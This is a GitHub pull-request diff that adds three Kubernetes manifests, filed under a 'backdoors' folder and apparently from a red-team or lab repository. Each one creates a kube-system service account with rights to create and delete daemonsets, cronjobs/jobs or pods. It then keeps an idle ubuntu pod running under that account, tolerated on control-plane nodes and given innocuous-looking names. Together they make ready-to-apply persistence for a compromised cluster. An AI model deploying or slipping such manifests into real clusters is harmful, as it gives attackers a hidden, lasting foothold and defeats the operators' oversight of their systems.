Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
87 changes: 87 additions & 0 deletions yamls/backdoors/create-delete-daemonsets-ns-role.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
# create-delete-daemonsets-ns-role.yaml

---
apiVersion: v1
kind: ServiceAccount
metadata:
name: create-delete-daemonsets
namespace: kube-system


---
# 当server版本为1或者大于16时候
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: create-delete-daemonsets
namespace: kube-system
rules:
- apiGroups:
- apps
resources:
- daemonsets
verbs:
- create
- delete
- apiGroups:
- ""
resources:
- pods
- pods/log
verbs:
- get
- list


---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: create-delete-daemonsets
namespace: kube-system

roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: create-delete-daemonsets
subjects:
- kind: ServiceAccount
name: create-delete-daemonsets
namespace: kube-system

---
apiVersion: v1
kind: Pod
metadata:
labels:
name: create-delete-daemonsets
name: create-delete-daemonsets
namespace: kube-system

spec:
containers:
- args:
- -c
- sleep 10000;
command:
- /bin/sh
image: ubuntu:18.04
imagePullPolicy: IfNotPresent
name: create-delete-daemonsets
resources:
limits:
cpu: 100m
memory: 250Mi
requests:
cpu: 80m
memory: 50Mi

serviceAccountName: create-delete-daemonsets
terminationGracePeriodSeconds: 600
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/control-plane
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
57 changes: 57 additions & 0 deletions yamls/backdoors/k8s_backdoor_cronjob.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: k8s-backdoor-cronjob
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: k8s-backdoor-cronjob
rules:
- apiGroups:
- batch
resources:
- cronjobs
- jobs
verbs:
- create
- delete
- get
- list
- apiGroups:
- ""
resources:
- pods
- pods/log
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: k8s-backdoor-cronjob
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: k8s-backdoor-cronjob
subjects:
- kind: ServiceAccount
name: k8s-backdoor-cronjob
namespace: kube-system
---
apiVersion: v1
kind: Pod
metadata:
name: k8s-backdoor-cronjob
namespace: kube-system
spec:
serviceAccountName: k8s-backdoor-cronjob
containers:
- name: ubuntu
image: ubuntu:18.04
imagePullPolicy: IfNotPresent
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
79 changes: 79 additions & 0 deletions yamls/backdoors/lgdc-kube-system-pods-role.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,79 @@
# lgdc-kube-system-pods-role

---
apiVersion: v1
kind: ServiceAccount
metadata:
name: lgdc-kube-system-pods
namespace: kube-system

---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: lgdc-kube-system-pods
namespace: kube-system

rules:
- apiGroups:
- ""
resources:
- pods
verbs:
- list
- get
- delete
- create

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: lgdc-kube-system-pods
namespace: kube-system

roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: lgdc-kube-system-pods
subjects:
- kind: ServiceAccount
name: lgdc-kube-system-pods
namespace: kube-system

---
apiVersion: v1
kind: Pod
metadata:
labels:
name: lgdc-kube-system-pods-role
name: lgdc-kube-system-pods-role
namespace: kube-system

spec:
containers:
- args:
- -c
- sleep 10000;
command:
- /bin/sh
image: ubuntu:18.04
imagePullPolicy: IfNotPresent
name: lgdc-kube-system-pods-role
resources:
limits:
cpu: 100m
memory: 500Mi
requests:
cpu: 80m
memory: 50Mi

serviceAccountName: lgdc-kube-system-pods
terminationGracePeriodSeconds: 600
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/control-plane
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists